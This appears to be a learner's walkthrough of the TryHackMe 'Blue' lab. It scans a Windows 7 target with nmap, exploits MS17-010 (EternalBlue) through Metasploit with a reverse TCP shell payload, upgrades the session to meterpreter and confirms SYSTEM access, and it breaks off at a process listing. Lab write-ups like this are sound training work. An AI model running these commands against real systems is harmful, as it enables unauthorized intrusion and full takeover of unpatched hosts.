https://tryhackme.com/r/room/blue

Date Completed: 5/10/2024

TASK1_RECON:
1. Scan the machine.
Okay we're going to use nmap to scan for vulnerabilities.
└─$ nmap -sV -sC --script vuln 10.10.185.66
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-10 21:53 EDT
Nmap scan report for 10.10.185.66
Host is up (0.11s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-ccs-injection: No reply from server (TIMEOUT)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.56 seconds

2. How many ports are open with a port number under 1000: 3
Looking at the previous scan, we see port 135, 139, and 445 open. 

3. What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067): ms17-010
ms17-010 stands for eternal blue, hince the name of the room.

TASK2_GAIN_ACCESS:

1. Start Metasploit:
$ msfconsole

2. Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........):
msf6 > search ms17-010
exploit/windows/smb/ms17_010_eternalblue

3. Show options and set the one required value. What is the name of this value? (All caps for submission): RHOSTS
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes 

4. Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:

set payload windows/x64/shell/reverse_tcp

With that done, run the exploit!

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.185.66
RHOSTS => 10.10.185.66
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST (my_ip)
LHOST => (my_ip)
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.6.4.208:4444 
[*] 10.10.185.66:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.185.66:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.185.66:445      - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.185.66:445 - The target is vulnerable.
[*] 10.10.185.66:445 - Connecting to target for exploitation.
[+] 10.10.185.66:445 - Connection established for exploitation.
[+] 10.10.185.66:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.185.66:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.185.66:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.185.66:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.185.66:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.185.66:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.185.66:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.185.66:445 - Sending all but last fragment of exploit packet
[*] 10.10.185.66:445 - Starting non-paged pool grooming
[+] 10.10.185.66:445 - Sending SMBv2 buffers
[+] 10.10.185.66:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.185.66:445 - Sending final SMBv2 buffers.
[*] 10.10.185.66:445 - Sending last fragment of exploit packet!
[*] 10.10.185.66:445 - Receiving response from exploit packet
[+] 10.10.185.66:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.185.66:445 - Sending egg to corrupted connection.
[*] 10.10.185.66:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.185.66
[*] Command shell session 1 opened (10.6.4.208:4444 -> 10.10.185.66:49204) at 2024-05-10 22:18:04 -0400
[+] 10.10.185.66:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.185.66:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.185.66:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
          

C:\Windows\system32>

5. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target. 
C:\Windows\system32>^Z
Background session 1? [y/N]  y
msf6 exploit(windows/smb/ms17_010_eternalblue) > 

TASK3_ESCALATE:

1. If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected): post/multi/manager/shell_to_meterpreter

2. Select this (use MODULE_PATH). Show options, what option are we required to change: SESSION
msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connectio
                                       n
   LHOST                     no        IP of host that will receive the connection from the pa
                                       yload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

3. Set the required option, you may need to list all of the sessions to find your target here. 
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1

4. Run! If this doesn't work, try completing the exploit from the previous task once more.
I also had to set the local port to match up with the exploit:
msf6 post(multi/manage/shell_to_meterpreter) > setg LPORT 4444
LPORT => 4444
msf6 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.6.4.208:4444 
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > 
[*] Sending stage (201798 bytes) to 10.10.185.66
[*] Meterpreter session 2 opened (10.6.4.208:4444 -> 10.10.185.66:49221) at 2024-05-10 22:32:53 -0400
[*] Stopping exploit/multi/handler
Interrupt: use the 'exit' command to quit
msf6 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  1         shell x64/windows        Shell Banner: Microsoft Win  10.6.4.208:4444 -> 10.10.185
                                     dows [Version 6.1.7601] ---  .66:49204 (10.10.185.66)
                                     --
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-P  10.6.4.208:4444 -> 10.10.185
                                     C                            .66:49221 (10.10.185.66)

msf6 post(multi/manage/shell_to_meterpreter) >

5. Once the meterpreter shell conversion completes, select that session for use.
msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter > 

6. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again. 
We saw in number 4. that we are NT AUTHORITY\SYSTEM.
C:\Windows\system32>whoami
whoami
nt authority\system

7.List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
meterpreter > ps

Process List
============

 PID   PPID  Name            Arch  Session  User                      Path
 ---   ----  ----            ----  -------  ----                      ----
